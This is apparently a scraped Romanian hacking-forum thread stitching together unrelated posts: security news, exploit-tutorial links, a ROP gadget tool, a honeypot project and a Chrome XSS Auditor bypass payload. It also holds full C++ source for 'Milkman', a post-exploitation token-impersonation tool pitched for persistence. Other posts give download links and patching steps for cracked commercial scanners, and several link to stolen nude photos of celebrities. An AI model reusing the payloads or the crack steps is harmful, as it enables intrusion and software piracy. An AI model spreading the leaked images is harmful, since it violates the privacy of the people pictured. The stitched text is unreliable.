Nytro

Packet Storm Security Linux Exploit Writing Linux Exploit Writing Tutorial Part 1 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 1 - Stack Overflows. [/TD] [/TR] [/TABLE] Linux Exploit Writing Tutorial Part 2 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 2 - Stack Overflow ASLR bypass using ret2reg instruction from vulnerable_1. [/TD] [/TR] [/TABLE] Linux Exploit Writing Tutorial Part 3 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 3 - ret2libc. [/TD] [/TR] [/TABLE] Linux Exploit Development Part 2 Rev 2 Linux Exploit Writing Tutorial Part 3 Rev 2 Code: Linux Exploit Writing Tutorial Part 1 ? Packet Storm Linux Exploit Writing Tutorial Part 2 ? Packet Storm Linux Exploit Development Part 2 Rev 2 ? Packet Storm Linux Exploit Writing Tutorial Part 3 ? Packet Storm Linux Exploit Writing Tutorial Part 3 Revision 2 ? Packet Storm Sursa: EXETOOLS FORUM

Nu suntem hipsteri cu Apple. Bine, doar @aelius e .

E bun bre. SSL pinning = hardcoded RootCA/Server certificate. Asta inseamna ca previne Man in the Middle chiar si cu RootCA instalat local (telefon sau calculator).

[h=1]Ropper – rop gadget finder and binary information tool [/h] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. Ropper was inspired by ROPgadget, but should be more than a gadgets finder. So it is possible to show information about a binary like header, segments, sections etc. Furthermore it is possible to edit the binaries and edit the header fields. Until now you can set the aslr and nx flags. usage: ropper.py [-h] [-v] [--console] [-f <file>] [-i] [-e] [--imagebase] [-c] [-s] [-S] [--imports] [--symbols] [--set <option>] [--unset <option>] [-I <imagebase>] [-p] [-j <reg>] [--depth <n bytes>] [--search <regex>] [--filter <regex>] [--opcode <opcode>] [--type <type>] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. supported filetypes: ELF PE supported architectures: x86 x86_64 MIPS optional arguments: -h, --help show this help message and exit -v, --version Print version --console Starts interactive commandline -f <file>, --file <file> The file to load -i, --info Shows file header [ELF/PE] -e Shows EntryPoint --imagebase Shows ImageBase [ELF/PE] -c, --dllcharacteristics Shows DllCharacteristics [PE] -s, --sections Shows file sections [ELF/PE] -S, --segments Shows file segments [ELF] --imports Shows imports [ELF/PE] --symbols Shows symbols [ELF] --set <option> Sets options. Available options: aslr nx --unset <option> Unsets options. Available options: aslr nx -I <imagebase> Uses this imagebase for gadgets -p, --ppr Searches for 'pop reg; pop reg; ret' instructions [only x86/x86_64] -j <reg>, --jmp <reg> Searches for 'jmp reg' instructions (-j reg[,reg...]) [only x86/x86_64] --depth <n bytes> Specifies the depth of search (default: 10) --search <regex> Searches for gadgets --filter <regex> Filters gadgets --opcode <opcode> Searches for opcodes --type <type> Sets the type of gadgets [rop, jop, all] (default: all) example uses: [Generic] ropper.py ropper.py --file /bin/ls --console [Informations] ropper.py --file /bin/ls --info ropper.py --file /bin/ls --imports ropper.py --file /bin/ls --sections ropper.py --file /bin/ls --segments ropper.py --file /bin/ls --set nx ropper.py --file /bin/ls --unset nx [Gadgets] ropper.py --file /bin/ls --depth 5 ropper.py --file /bin/ls --search "sub eax" ropper.py --file /bin/ls --filter "sub eax" ropper.py --file /bin/ls --opcode ffe4 ropper.py --file /bin/ls --type jop ropper.py --file /bin/ls --ppr ropper.py --file /bin/ls --jmp esp,eax ropper.py --file /bin/ls --type jop [h=2]Download[/h] https://github.com/sashs/Ropper (v1.0.1, 01.09.2014) Sursa: Ropper - rop gadget finder and binary information tool

The Chinese Underground In 2013 2:04 am (UTC-7) | by Lion Gu (Senior Threat Researcher) The Chinese underground has continued to grow since we last looked at it. It is still highly profitable, the cost of connectivity and hardware continues to fall, and there are more and more users with poor security precautions in place. In short, it is a good time to be a cybercriminal in China. So long as there is money to be made, more people may be tempted to become online crooks themselves. How can we measure the growth of the Chinese underground economy? We can look at the volume of their communications traffic. Many Chinese cybercriminals talk via groups on the popular Chinese instant messaging application QQ. We have been keeping an eye on these groups since March 2012. By the end of 2013, we had obtained 1.4 million publicly available messages from these groups. The data we gathered helped us determine certain characteristics and developing trends in the Chinese underground economy. First, the number of messages showed that the amount of underground activity in China doubled in the last 10 months of 2013 compared with the same period in 2012. Based on the ID of the senders, we also believe that the number of participants has also doubled in the same period. Cybercriminals are also going where the users are. Many of the malicious goods being sold in the underground economy are targeted at mobile users, as opposed to PC users. A mobile underground economy is emerging in China (something we noted earlier this year), and this part of the underground economy appears to be more attractive and lucrative than other portions. Our latest paper in the Cybercrime Underground Economy Series titled The Chinese Underground In 2013 contains the details of these findings related to QQ, as well as other updates dealing with the Chinese underground. Sursa: The Chinese Underground In 2013 | Security Intelligence Blog | Trend Micro

Latest Firefox version adds protection against rogue SSL certificates Firefox 32 has implemented a feature known as certificate key pinning By Jeremy Kirk | IDG News Service Mozilla has added a defense in its latest version of Firefox that would help prevent hackers from intercepting data intended for major online services. The feature, known as certificate key pinning, allows online services to specify which SSL/TLS (Secure Sockets Layer/Transport Security Layer) certificates are valid for their services. The certificates are used to verify a site is legitimate and to encrypt data traffic. The idea is to prevent attacks such as the one that affected Google in 2011, targeting Gmail users. A Dutch certificate authority (CA), Diginotar, was either tricked or hacked and issued a valid SSL certificate that would work for a Google domain. In theory, that allowed the hackers to set up a fake website that looked like Gmail and didn't trigger a browser warning of an invalid SSL certificate. Security experts have long warned that attacks targeting certificate authorities are a threat. Certificate pinning would have halted that kind of attack, as Firefox would have known Diginotar shouldn't have issued a certificate for Google. In Firefox 32, "if any certificate in the verified certificate chain corresponds to one of the known good (pinned) certificates, Firefox displays the lock icon as normal," wrote Sid Stamm, senior manager of security and privacy engineering at Mozilla, on a company blog. "When the root cert for a pinned site does not match one of the known good CAs, Firefox will reject the connection with a pinning error," he continued. The "pins" for the certificates of online services have to be encoded into Firefox. Firefox 32, released this week, supports Mozilla sites and Twitter. Later Firefox releases will support certificate pinning for Google sites, Tor, Dropbox and others, according to a project wiki. Sursa: Latest Firefox version adds protection against rogue SSL certificates | Applications - InfoWorld

Milkman: Creating Processes as Any Currently Logged in User One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Ya, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get any proxy settings. Here is a blog post that I made about setting the proxies for SYSTEM but leaving settings like this set is not only sloppy but hard to clean up. Along comes RunAsCurrentUser-2.0.3.1.exe I found this gem by messing up a search on google for RunAsUser. Found it on this IBM support post. Link to direct download: http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe Here is a mirror uploaded to my Post Exploitation repo: https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it’s created by a legitimate company for legitimate reasons? w00tw00t. Game on! Only two problems: It is 335K, which doesn’t seem like much but over high latency lines that can take an eternity to transfer, especially over doubly encrypted channels like with a reverse_https meterpreter session. It takes an argument which normally isn’t a huge challenge, but in our specific use case, psexec modules in Metasploit, it isn’t something we can do easily. You would have to upload your C2 binary, as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy. So I set to try and figure out how this binary did it’s magic. As I’m not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at it’s insides (plus, double check to see if it was being detected as malicious at all). As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser, and CreateProcessAsUserA. I set to trying to reproduce what it did in AutoIT (awesome stuff if you have never checked it out). I couldn’t quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple. I present to you “Milkman”: https://gist.github.com/mubix/5d0cacdabfe092922fa3 (full source included below) This program (once compiled) takes one argument (or none at all) and runs calc.exe for every instance of the process you tell it to. If you run it without arguments it auto selects explorer.exe. So if you create a service: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto [sC] CreateService SUCCESS[/TD] [/TR] [/TABLE] It will start up every time the computer starts, which is completely useless, since there won’t be any users logged in at that point, but you get where this can go. Features to add to this at point are: Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful. Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in. Finally the obvious one is to change it from being calc.exe that it runs by accepting another argument or some other kind of config option. Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below. #ifndef UNICODE#define UNICODE #endif #include <Windows.h> #include <string.h> #include <stdio.h> #include <Psapi.h> void perror(DWORD nStatus) { LPVOID lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, nStatus, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL); wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf); if (lpMsgBuf) { LocalFree(lpMsgBuf); } } int str_ends_with(TCHAR * str, TCHAR * suffix) { if (str == NULL || suffix == NULL) { return 0; } size_t str_len = wcslen(str); size_t suffix_len = wcslen(suffix); if (suffix_len > str_len) { return 0; } return 0 == wcscmp(str + str_len - suffix_len, suffix); } int start_process(int PID) { TCHAR cmd[512] = TEXT("calc.exe"); STARTUPINFO startup_info; PROCESS_INFORMATION process_information; SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation; LPVOID pEnvironment; HANDLE hProc = NULL; HANDLE hToken = NULL; HANDLE hTokenDup = NULL; ZeroMemory(&startup_info, sizeof(startup_info)); startup_info.cb = sizeof(startup_info); ZeroMemory(&process_information, sizeof(process_information)); ZeroMemory(&pEnvironment, sizeof(pEnvironment)); hProc = OpenProcess(GENERIC_ALL, FALSE, PID); //perror(GetLastError()); OpenProcessToken(hProc, GENERIC_ALL, &hToken); //perror(GetLastError()); ImpersonateLoggedOnUser(hToken); //perror(GetLastError()); DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup); //perror(GetLastError()); CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, &pEnvironment, NULL, &startup_info, &process_information); //perror(GetLastError()); return 0; } int find(TCHAR *name) { //wprintf(TEXT("Looking for %s\n"), name); DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; HANDLE hProcessEnum; TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) { return 1; } cProcesses = cbNeeded / sizeof(DWORD); for (i = 0; i < cProcesses; i++) { if (aProcesses != 0) { hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses); if (NULL != hProcessEnum) { GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)); if (str_ends_with(szProcessName, name)) { //wprintf(TEXT("[+] %d -\t%s\n"), aProcesses, szProcessName); start_process(aProcesses); } } } } return 0; } int wmain(int argc, TCHAR * argv[]) { if (argc > 1 && argv[1]) { find(argv[1]); //sperror(GetLastError()); } else { find(TEXT("explorer.exe")); //perror(GetLastError()); } return 0; } Posted by mubix Aug 14th, 2014 Sursa: Milkman: Creating processes as any currently logged in user - Room362.com

Google Chrome 31.0 XSS Auditor Bypass Authored by Rafay Baloch Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well. #Vulnerability: Google Chrome 31.0 XSS Auditor Bypass #Impact: Moderate #Authors: Rafay Baloch #Company: RHAInfoSec #Website: http://rhainfosec.com <http://rhainfose.com/> #version: Latest Description Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well. Proof Of concept: Consider the following code: <html> <body> <script type="text/javascript"> document.write(location.hash); </script> </body> </html> This takes input from location.hash property and writes it to the DOM. We initially inject the following payload: #<img src=x onerror=prompt(1)>. The request is blocked and the following error is returned: " The XSS Auditor refused to execute a script in 'attacker.com#><img src=x onerror=prompt(1)>' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header." However, the following vector passes by: #<img src=x onerror=prompt(1)// The following is how its reflected inside of DOM: <img src="x" onerror="prompt(1)//" <="" body=""> Sursa: Google Chrome 31.0 XSS Auditor Bypass ? Packet Storm

[h=2]Bifrozt - A high interaction honeypot solution for Linux based systems.[/h]Tue, 09/02/2014 - 12:34 — are.hansen A few days ago I was contacted by our CPRO, Leon van der Eijk, and asked to write a blog post about my own project called Bifrozt; something which I was more than happy to do. This post will explain what Bifrozt is, how this got started, the overall status of the project and what will happen further down the road. What is Bifrozt? Generally speaking, Bifrozt is a NAT device with a DHCP server that is usually deployed with one NIC connected directly to the Internet and one NIC connected to the internal network. What differentiates Bifrozt from other standard NAT devices is its ability to work as a transparent SSHv2 proxy between an attacker and your honeypot. If you deployed a SSH server on Bifrozt's internal network it would log all the interaction to a TTY file in plain text that could be viewed later and capture a copy of any files that were downloaded. You would not have to install any additional software, compile any kernel modules or use a specific version or type of operating system on the internal SSH server for this to work. It will limit outbound traffic to a set number of ports and will start to drop outbound packets on these ports when certain limits are exceeded. How it started. Bifrozt is not something I can take full credit for, it depends on a awesome python project by Thomas Nicholson which I discovered in February 2014. Thomas had coded a SSH proxy called HonSSH and had taken inspiration and utilized code from the medium interaction Kippo honeypot. After I discovered HonSSH I decided to build an ISO file, that would allow me to install a pre-configured NAT device with HonSSH, on either a hardware or virtualized machine. I thought this would be a suitable project that I could occupy myself with during a 2 week holiday. Six months later and the project is still very much alive. Current status. Me and Thomas have been co-operating over the last five months to align our projects as much possible. Developing Bifrozt is much like building a car. Thomas is developing the engine (HonSSH) and making sure it's running smoothly, whilst I am developing the strong and solid frame (firewall, data extraction from log files, data control, system configuration etc etc) around it. Bifrozt has been in a proof of concept stage (Alpha) for the last six months. The current version, 0.0.8, has a relative humble feature list, but this is about to change. Bifrozt 0.0.8 -------------- - Intercept downloaded files - Logs all SSH communications to plain text file and TTY logs - Enforces data control - Facilitates data capture - Provides high level integrity of the captured data - Hardware installation - Virtual installation - Honeyd is pre-installed - Easy data extraction from logs - Disrupts outbound SYN flood attacks from the honeypot - Disrupts outbound UDP flood attacks from the honeypot - Compatible with amd64 architecture After after a few weeks of summer vacation I've started planning and testing the next release of Bifrozt. Bifrozt 0.0.9 -------------- - Compatible with x86 architecture - IDS (Snort or Suricata) - Viewing alerts and statistics trough a browser - Complete overhaul of the Python code - Multiple installation options to better suit the hardware resources and needs of the end user - Expand the current toolbox - Change base system from Ubuntu to Debian (not made any final decision about this yet) - Tool to generate DROP rules based on country of origin - Update and add more functions to bifrozt_stats (log data extraction) Roadmap for the future. No one knows what is going to happen down the road but, at the present time neither me or Thomas plan on abandoning our projects any time soon. We have both decided to create a road map for the future and he has allowed me to share them here, together with mine. Bifrozt roadmap. ------------------- Short term goals (Alpha stage): System: - Off line installation - Desktop environment (install option) - Optimizing IDS - Expand/improve web stats (optimize current, add HonSSH, create a dedicated start page) - HP feeds data sharing - Optimize firewall and data control Tools: - Simple static malware analysis (add VirusTotal upload function) - System re-configuration tool(s) (DHCP, SSH, firewall etc etc) - Develop new tools or adjust current to complement additional data captured by HonSSH Long term goals (Beta stage and beyond): - Provide a NAT device that provides reliant data capture of the most commonly used protocols - Quickly display data about the attacks, malware, outbound communication in a easy understandable format - To the extent of my abilities, make suer the project continues to be based on open source and freely available to anyone. HonSSH roadmap. --------------------- Short term: - Bring HonSSH out of proof-of-concept code into a more logical production format - Implement a bot to owner correlation technique using random passwords - Bug bashing Longer term: - Output data to ElasticSearch - Allow HTTP tunneling (currently disabled), parse HTTP outputs etc. - Parse X11 sessions - not sure if this will be worth it or not. - More consideration on data analysis (might be a separate project) HonSSH's current aim: - Parse, interpret and log all communications that travel through an SSH tunnel. Currently supports Terminal, Exec (and SCP) and SFTP traffic. HonSSH's current challenges: - Parsing the terminal - knowing what is a command, and what is program input e.g. nano etc. HonSSH's current questions: - Should HonSSH act on commands? e.g. When a wget command is detected, should it pull down the file (active), or should we use/develop another tool for passive packet capture/MITM of HTTP and IRC LINKS: Bifrozt HonSSH Sursa: https://www.honeynet.org/node/1191

http://bunga-videos.com/xxx/epic-celebrity-nude-leak-jennifer-lawrence-kate-upton-more/

RiskTool.Patcher HackTool[CrackTool:not-a-virus]/Win32.Patcher Win32:Patcher-AK [PUP] Riskware/GamePatcher PUA.HackTool.Patcher Majoritatea spun ca e "Patcher". E oarecum normal sa fie detectat, e un keygen.

Here is netsparker 3.5.3 Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: Download Crack rar I highly recommend that you use the cracks/patch after testing and download the apps trail versions from official websites and then use cracks on those. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138

Webinspect 10.20: download the application from official site itself. Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: https://download.hpsmartupdate.com/webinspect/ and crack here: Crack: hp webinspect crack.rar — RGhost — file sharing to crack copy WI8.exe and HPLicense.xml in installation folder double click WI8.exe first click on license and browse HPLicense.xml Then click on patch. Enjoy will be valid till 2020. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138

You can download trail version of appscan from their site by registering and downloading evaluation version. Otherwise you can download from here Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: ??? ??-qinxiaopeng456??? Download APPS_STD_EDI_9.0_WIN_ML_EVA .exe and LicenseProvider.dll Install appscan and then replace the LicenseProvider.dll in installation directory. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138

Audit Your Website Security with Acunetix Web Vulnerability Scanner As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases. Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere: Download (cracked): Download Web Vul Scanner tar Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138

Tinerii din ziua de azi... Instaleaza AdBlock Plus.

Cacat pe paine: - nu au site (Wiki-shit) - videoclipul de prezentare se adreseaza cocalarilor anonimusi - "grafica" mi-ar fi placut... cand aveam 12 ani Nu se compara Kali, un sistem de operare stabil, mentinut de catre o echipa de profesionisti, cu zdrancaneaua asta. Edit: Ma uit peste scriptul lor de "install-cloud-pizda-pe-paine": echo "deb http://frozenbox.mirror.garr.it/mirrors/parrot stable main" > /etc/apt/sources.list.d/parrot.list echo "deb http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\n\ndeb http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free" > /etc/apt/sources.list.d/debian.list echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list echo "deb http://repo.mate-desktop.org/debian wheezy main" > /etc/apt/sources.list.d/mate.list wget -qO - http://repository.frozenbox.org/parrot/frozenbox.gpg.key | apt-key add - wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add - wget -qO - http://repo.mate-desktop.org/debian/mate-archive-keyring.gpg | apt-key add - apt-get update apt-get -y install apt-parrot --no-install-recommends apt-get update apt-get -y install parrot-core parrot-cloud parrot-tools-cloud apt-get dist-upgrade Mai exact: echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add - Era evident: E doar un Kali colorat de-am-pulea.

Romanian Porn Team aka Hackerii Porno

Hopa. Au disparut pozele cu Jennifer.

C/C++ and Buffer Overflow Topics Buffer overflow, one of the widely used exploit in the last decades that effect the internet domain in large for example through virii and worms. What is the real cause actually? In this tutorial we will investigate some of the fundamental reasons that can be found in C/C++ programs, applications and processors that can generate the buffer overflow problem. Though most of the C/C++ functions/libraries already implemented new constructs, the secure constructs, the effect still can be seen till today. You will see that programmers also must be competent and have the responsibility in building programs or applications that are secure. [h=1] Introduction - Intro to how and why buffer overflow happens and exploited.[/h] [h=1] Basic of x86 Architecture - The basic of Intel processor internal architecture that related to buffer overflow topics, registers and basic instruction sets operations.[/h] [h=1] Assembly Language - Introduction to the assembly language, needed to program buffer overflow codes during the Shellcode building, payload crafting and shrinking the size of the C programs.[/h] [h=1] Compiler, Assembler & Linker - The process of compiling, assembling and linking C/C++ codes, the step-by-step operations.[/h] [h=5] C Function Operation - The details of the C/C++ function operation, stack call setup and destruction.[/h] [h=1] C Stack Setup - The C/C++ stack story, exposes the exploited buffer in registers.[/h] [h=1] Stack Operation - The C/C++ stack operation that exposes the exploited buffer.[/h] [h=1] Stack-based Buffer Overflow - How the processor's buffer can be over flown by malicious codes.[/h] [h=1] Shellcode: The Payload - Understanding and creating the shellcodes for the buffer overflow payloads, creating the malicious codes.[/h] [h=1] Vulnerability & Exploit Examples - Testing the the real C codes in the real and controlled environment to show the buffer overflow in action. Escalating the local Linux Fedora Core root privilege.[/h] [h=1] C, C++ and Bufferoverflow Books[/h] - See more at: The buffer overflow hands-on tutorial using C programming language on Linux/Unix platforms and Intel microprocessor architecture with C code samples and tons of illustrations

Nude photos of Jennifer Lawrence and others posted online by alleged hacker Website user publishes list of 100 mostly female actors, singers and celebrities of whom they claim to have explicit images Paul Farrell Pictures of Hunger Games star Jennifer Lawrence have been circulating on the internet. Photograph: Rotello/Photofab/REX/Rotello/Photofab/REX Images of more than 100 well-known actors, singers and celebrities, including what appear to be nude photos and videos, may have been exposed by a hacker in a major breach of privacy. On Sunday a user on the 4chan website posted a list of mostly female actors and public figures, including Jennifer Lawrence, Avril Lavigne, Kim Kardashian, Rihanna, Kirsten Dunst, Aubrey Plaza and Winona Ryder, of whom they claim to have explicit photographs or videos. A number of photos from some celebrities, including Hunger Games star Lawrence, have since been circulating on file-sharing and photo sites. 4chan quickly removed the posts from their site but screenshots of the list by one of the posters has a list of more than 60 names of celebrities who are alleged to have been hacked. The release of the images has drawn varying responses from the celebrities, with some conceding they are real photos and others denying their veracity. Buzzfeed reported that the user had also posted images of his desktop, one of which appeared to be an image of Jennifer Lawrence. A spokesman for Lawrence said: “This is a flagrant violation of privacy. The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence.” Bla bla. Pozele porno sunt aici: http://www.reddit.com/r/TheFappening/comments/2f44n0/new_celeb_leaked_pics_all_in_one_place/ Jennifer Lawrence: http://imgur.com/a/KWOV2#0 Sursa: Nude photos of Jennifer Lawrence and others posted online by alleged hacker | World news | theguardian.com

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files). Also see: unix-privesc-check | pentestmonkey Download: https://code.google.com/p/unix-privesc-check/

Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing. Start with a quick Tutorial, read about Modules and Generators. More than 30 modules to automate administration and post exploitation tasks Backdoor communications are hidden in HTTP Cookies Communications are obfuscated to bypass NIDS signature detection Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection Download: https://epinna.github.io/Weevely/

[h=1][/h] Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP. Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible. To learn more about security and anonymity under Whonix, please continue to the About Whonix page. Info: https://www.whonix.org/

Have fun: Leaks - Imgur Jennifer Lawrence si alte vedete "naked" :->